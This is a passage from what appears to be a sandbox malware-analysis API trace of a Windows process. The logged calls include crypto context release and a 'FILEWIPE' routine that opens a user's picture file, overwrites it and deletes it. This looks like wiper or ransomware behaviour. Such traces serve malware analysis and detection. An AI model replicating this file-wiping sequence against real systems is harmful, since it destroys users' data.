wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.225] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.226] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.226] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0191.226] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.226] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.226] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.226] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0191.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.226] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.227] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.227] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.227] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.227] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.227] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.227] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.227] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.227] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.227] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.227] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.227] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.227] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0191.227] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.228] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.228] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0191.228] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0191.228] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.228] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.228] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.229] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.229] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.230] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0191.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x4b84be50, ftLastWriteTime.dwHighDateTime=0x1d5d858, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 0x90ae18 [0191.230] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.230] CharLowerBuffW (in: lpsz="byte[88297]", cchLength=0xb | out: lpsz="byte[88297]") returned 0xb [0191.230] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.231] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.231] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.231] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.231] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.231] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0191.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.235] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.235] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.236] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.236] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.237] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ityvcrmyofcy 0-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0191.237] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.237] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.237] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.237] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.237] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.237] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.238] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.238] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.238] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.239] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.239] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.239] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.239] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.239] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpFilePart=0x0) returned 0x3a [0191.239] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x17346ac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 0x90ae18 [0191.239] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ityvcrmyofcy 0-.png")) returned 1 [0191.242] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x17346ac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 0 [0191.242] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.245] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.246] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 